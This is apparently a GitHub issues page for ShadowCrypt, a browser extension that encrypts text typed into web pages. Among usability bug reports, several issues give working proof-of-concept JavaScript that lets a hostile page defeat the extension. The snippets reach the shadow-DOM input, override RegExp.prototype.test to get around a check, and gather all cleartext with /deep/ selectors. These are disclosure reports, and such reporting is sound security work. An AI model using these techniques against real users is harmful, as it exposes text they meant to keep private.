sunblaze-ucb / shadowcrypt Goto Github PK

I do not see the license of this software. If there is no license, license it, and consider a GPLv3.

I can't type while the extension is enabled, making it unusable. It continuously goes out of focus. Lock icon is also very buggy.

When submitting a text submission to Reddit with the extension enabled the arrow keys and the backspace key move/remove two characters for every key press. Here is a video showing this in action http://quick.as/ao2jcxq8.

Enter / Return key defaults to New line, but even in `https://www.facebook.com/messages/' where one can activate a message send button, text does not enter.

This is less important, given that shadowRoot is no longer a property in recent versions of Chrome.

The protections of the content script should still be put in place on objects and prototypes before the application has a chance to use them.

inputBox.parentNode.removeChild(inputBox);
inputBox = inputBox.cloneNode();
Object.defineProperty(inputBox, "shadowRoot", {configurable: false});
parentBox.appendChild(inputBox);

The page code above makes the shadowRoot property non configurable on the object before it is added to the DOM. The mutation observer in shadowcrypt (the one in charge of deleting that attribute) runs only after the element is added. Reconfiguration will fail.

Would be a good idea to make sure the properties modified have the expected flags before they are modified.

This approach won't work any more since modern browsers (I have tested it with chrome) don't let you create additional shadow-root to input/textarea. More info here.

It works in Gmail for <div role="textbox"></div>, but after you press a key, the delegate loses its focus. Any idea why?

I put a proof-of-concept at http://s.codepen.io/danielzfranklin/debug/YwvVVP.

If the browser supports it, element.shadowRoot.querySelector can be used to access the underlying element. It works in Chrome 48 but does not appear to be in the W3C standard. Otherwise, element.shadowRoot.activeElement can be polled until the input field is clicked on, activeElement is standardized in the spec at http://w3c.github.io/webcomponents/spec/shadow/#the-shadowroot-interface

if var input = [an input element secured by shadowcrypt] the following code will try both methods to get the contents of the shadow input.

function found_shadow_input(shadow_input){
    // Do whatever on the DOM node of the shadow_input
    // attach listeners, log the value, etc.
}

function break_into_shadowroot(){
    if(input.shadowRoot.querySelector){
        // find using querySelector
        found_shadow_input(input.shadowRoot.querySelector("input.delegate"));
        console.log("found using querySelector");
    }
    else{
        // poll activeElement until the user clicks on the input
        var shadow_input_searcher = setInterval(function(){
            var potential_elem = input.shadowRoot.activeElement;

            if(potential_elem && potential_elem.nodeName === "INPUT" && potential_elem.classList.contains("delegate")){
                clearInterval(shadow_input_searcher);
                found_shadow_input(potential_elem);
                console.log("found using activeElement");
            }
        }, 10);
    }
}

if(input.shadowRoot){
    break_into_shadowroot();
}
else{
    // if the extension hasn't loaded yet we may need to wait a few milliseconds
    var shadowroot_check_interval = setInterval(function(){
        if(input.shadowRoot){
            clearInterval(shadowroot_check_interval);
            break_into_shadowroot();
        }
    }, 10)
}

element.shadowRoot.querySelector is read-only so you can't monkeypatch it to fix this. What you use something else instead of an input element? A span could have its contents accessed with .innerHTML, but a dirty canvas can't be read off of. If you watched for keypresses and wrote them to a canvas if they were alphanumeric/symbols, moved a fake blinking cursor on arrow key press, moved the cursor on mouse click, and deleted letters on delete key press you could create a custom input element. If a clear pixel from a different domain was written in a corner, the canvas couldn't be read off of.

When the project is refactored to match Chrome's move from properties to getters on DOM objects, it should also be refactored to use methods local to the "within" closure.

It is currently possible for an adversarial page to modify prototype methods, such as RegExp.test to allow /deep/ selectors and get access to .delegate objects despite checks done inside shadowcrypt.

function allowDeep() {
    if (this.toString() === "/\/deep\/|>>>/") {
        return false;
    }
}
RegExp.prototype.test = allowDeep;

The /deep/ combinator can cross the shadow boundary, allowing a host script read/write access the same cleartext DOM presented to the user.

A parent application can easily get all ShadowCrypt cleartext on a page:

[].slice.call(document.querySelectorAll('body /deep/ span'))
.map(function(el) {
  return el.innerText
}).join('\n')

Not sure there's a way around it at this point.

unable to fully view configuration menu when using a vertical resolution of 768 or less

Something about how the text entry fields work there, this doesn't seem to recognize them.